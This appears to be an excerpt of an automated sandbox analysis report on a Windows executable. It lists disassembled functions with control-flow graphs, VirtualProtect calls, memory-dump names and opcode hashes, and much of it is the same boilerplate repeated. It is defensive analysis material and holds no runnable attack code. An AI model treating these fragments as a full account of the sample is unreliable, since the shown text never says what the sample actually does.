                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e2df1873d63fa1a06318112b14a010a9538ef87cf4fe15887921df63ce8a161f
                                                                                                                                                                                                                                                                                                • Instruction ID: 064f8fa3836340fe4a09f9ed83cbfec0a462ef6d0ccae8b76755501b7c72da8a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2df1873d63fa1a06318112b14a010a9538ef87cf4fe15887921df63ce8a161f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7A126A1D082988AF7248624DC44BEB7AB5EF51304F0480FED94D57282DA7E5FC9CF66
                                                                                                                                                                                                                                                                                                Function 00439110 Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 555 439110-43948a call 43913c 561 439490-43951b 555->561 562 43955e-439c43 call 4395e6 call 4398ff call 439918 555->562 561->562 577 43951d-439559 call 43954b 561->577 582 439c49-439ca6 call 439c6b VirtualProtect 562->582 577->582 591 439ca8-439ce6 582->591 592 439cee-439d40 call 439d41 582->592 591->592
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b5c9e1630c1d426ed5cb226821b8745af9104571647b640adad73cbd07e73668
                                                                                                                                                                                                                                                                                                • Instruction ID: 8ad00d06e6d220283ac6635a1fe9b6b26238995bdaf4142d6a6f827a83d18564
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5c9e1630c1d426ed5cb226821b8745af9104571647b640adad73cbd07e73668
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F9144B2D092199FFB208A10DC85AE777B8EB85310F1441FBD84E56281D67D5FC68FA2
                                                                                                                                                                                                                                                                                                Function 0044F4E4 Relevance: 1.8, APIs: 1, Instructions: 262memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 93b5dd32ced10469b956e73ebfcaa8495d9fb8462cf5040a2ffc015a48a21a59
                                                                                                                                                                                                                                                                                                • Instruction ID: a3718a56033c99e2bdd42d34cfea96cca9adf463ae2650c0b4dcba38067c4651
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93b5dd32ced10469b956e73ebfcaa8495d9fb8462cf5040a2ffc015a48a21a59
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57A118B1E082989AF7208625DC44BDB7AB5EF51304F0480FAD44D57282DA7E5FC98F66
                                                                                                                                                                                                                                                                                                Function 0044EE02 Relevance: 1.8, APIs: 1, Instructions: 258memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 651 44ee02-44ee17 653 44ee28-44ee48 call 44ee47 651->653 654 44ee19-44ee23 651->654 655 44f0e4-44f11d 653->655 654->655 657 44f160-44f1be call 44f179 655->657 658 44f11f-44fcbc VirtualProtect 655->658 668 44f1c0-44f1cc 657->668 669 44f1d1-44f1e6 657->669 664 44fcfc-44fd02 658->664 665 44fcbe-44fcfa 658->665 667 44fd08-44fd0f 664->667 665->667 673 44fd11-44fd43 call 44fd24 call 44fd3f 667->673 674 44fd48-44feec call 44feed 667->674 670 44f4c2-44f4c9 668->670 671 44f1e8-44f1f4 669->671 672 44f1f9-44f218 669->672 676 44f59d-44f5a8 call 44f5ab 670->676 677 44f4cf-44f4e3 call 44f4e4 670->677 671->670 679 44f21a-44f226 672->679 680 44f22b-44f23d 672->680 697 450291-45068a call 45036d call 450673 673->697 674->697 677->676 679->670 685 44f250-44f2b9 680->685 686 44f23f-44f24b 680->686 692 44f4b6-44f4bc 685->692 693 44f2bf-44f309 685->693 686->670 692->670 696 44f31a-44f32b 693->696 699 44f331-44f341 696->699 700 44f3cc-44f3ec call 44f3ee 696->700 722 450690-450804 call 450805 697->722 723 450f9c-4510ac call 450fac call 450fc2 call 4510bb 697->723 699->700 703 44f347-44f398 call 44f366 699->703 700->692 714 44f3be 703->714 715 44f39a-44f3bc 703->715 714->696 715->714 717 44f3c5 715->717 717->700
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 73b646848fde8b0a18d1dae2daf155659251c17dfbe4a902db16c48a77b49ac6
                                                                                                                                                                                                                                                                                                • Instruction ID: 889d3d5979365ffcc2759f7117510698b580ba284569ca754c7a982f090c5807
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73b646848fde8b0a18d1dae2daf155659251c17dfbe4a902db16c48a77b49ac6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EA128B1D082988AF7248624DC44BEB7BB5EF51314F1480FAD44D57282DA7E4FCACB66
                                                                                                                                                                                                                                                                                                Function 00450B81 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 250COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 190 450b81-450bbd 191 450bd0-450be5 190->191 192 450bbf-450bcb 190->192 194 450be7-450bf3 191->194 195 450bf8-450c17 191->195 193 450ec1-450ec8 192->193 198 450f9c-4510ac call 450fac call 450fc2 call 4510bb 193->198 199 450ece-450f1c call 450f1d 193->199 194->193 196 450c19-450c25 195->196 197 450c2a-450c3c 195->197 196->193 202 450c4f-450cb8 197->202 203 450c3e-450c4a 197->203 199->198 207 450eb5-450ebb 202->207 208 450cbe-450d2a 202->208 203->193 207->193 212 450d30-450d40 208->212 213 450dcb-450e1c call 450df3 208->213 212->213 215 450d46-450d79 call 450d6e 212->215 223 450e1e-450e28 213->223 224 450e2a-450e81 213->224 215->213 228 450e99-450ea0 223->228 225 450e83-450e8d 224->225 226 450e8f 224->226 225->228 226->228 230 450eb0 228->230 231 450ea2-450eae 228->231 230->193 231->193
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: W
                                                                                                                                                                                                                                                                                                • API String ID: 0-3182507374
                                                                                                                                                                                                                                                                                                • Opcode ID: d598e3f66b5acce90ab5671865a5880960a6b71ebd303294f3dd0101582c5a72
                                                                                                                                                                                                                                                                                                • Instruction ID: 4591ab11f7caf88b64320bdd8c74d2c4f26aad70e31dbd3bf6e540ed2521be35
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d598e3f66b5acce90ab5671865a5880960a6b71ebd303294f3dd0101582c5a72
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12B19BB5D042288FEB64CB14CC84BEABBB5FB84315F1440EAD80967342DA39AED5CF41
                                                                                                                                                                                                                                                                                                Function 00450F1D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 232 450f1d-450f59 235 450f9c-4510ac call 450fac call 450fc2 call 4510bb 232->235 236 450f5b-450f62 232->236 238 450f68 call 450f77 236->238 240 450f6d-450f76 238->240 240->235
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID: W
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-3182507374
                                                                                                                                                                                                                                                                                                • Opcode ID: 501e83d59178df0b0a80c3187e76ce94cff30d37e009e8dd16e924155f1b81be
                                                                                                                                                                                                                                                                                                • Instruction ID: 9ddd6951fc924a91401a4bf615135f3147cac00f1cf5976cceabd4da6fbd5488
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 501e83d59178df0b0a80c3187e76ce94cff30d37e009e8dd16e924155f1b81be
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A141F6F6D042249FF7209A10DC85BEB7B78EB84311F0540BBE90D96281D67D6EC58E62
                                                                                                                                                                                                                                                                                                Function 0044FBC9 Relevance: 1.8, APIs: 1, Instructions: 250memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 740 44fbc9-44fbec 741 44fbee-44fbf8 740->741 742 44fbfa-44fc51 740->742 743 44fc69-44fc70 741->743 748 44fc53-44fc5d 742->748 749 44fc5f 742->749 746 44fc80 743->746 747 44fc72-44fc7e 743->747 750 44fc91-44fcbc VirtualProtect 746->750 747->750 748->743 749->743 752 44fcfc-44fd02 750->752 753 44fcbe-44fcfa 750->753 754 44fd08-44fd0f 752->754 753->754 755 44fd11-44fd43 call 44fd24 call 44fd3f 754->755 756 44fd48-44feec call 44feed 754->756 765 450291-45068a call 45036d call 450673 755->765 756->765 777 450690-450804 call 450805 765->777 778 450f9c-4510ac call 450fac call 450fc2 call 4510bb 765->778
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 32de7649a281385f7957d886cbe8883e5962b7a1885297b56dc8ba8ddf07b3be
                                                                                                                                                                                                                                                                                                • Instruction ID: 4688688dd30b72f27e1b35f0a31bd08ad5d8ec2608884f7fd3f61d24e9d7606b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32de7649a281385f7957d886cbe8883e5962b7a1885297b56dc8ba8ddf07b3be
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51A1D871D085A88AFB248724DC447EA7BB5EF51304F1480FAC84D57282DA7E5FC98F66
                                                                                                                                                                                                                                                                                                Function 0043925C Relevance: 1.7, APIs: 1, Instructions: 249COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 795 43925c-4392ca 797 4392db-4392ec 795->797 798 4392f2-439302 797->798 799 43938d-4393de 797->799 798->799 800 439308-439359 798->800 801 4393e0-4393ea 799->801 802 4393ec-439443 call 43941a 799->802 803 43935b-43937d 800->803 804 43937f 800->804 805 43945b-439462 801->805 812 439451 802->812 813 439445-43944f 802->813 803->804 809 439386 803->809 804->797 807 439472 805->807 808 439464-439470 805->808 814 439483-43948a 807->814 808->814 809->799 812->805 813->805 815 439490-43951b 814->815 816 43955e-439c43 call 4395e6 call 4398ff call 439918 814->816 815->816 831 43951d-439559 call 43954b 815->831 836 439c49-439ca6 call 439c6b VirtualProtect 816->836 831->836 845 439ca8-439ce6 836->845 846 439cee-439d40 call 439d41 836->846 845->846
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
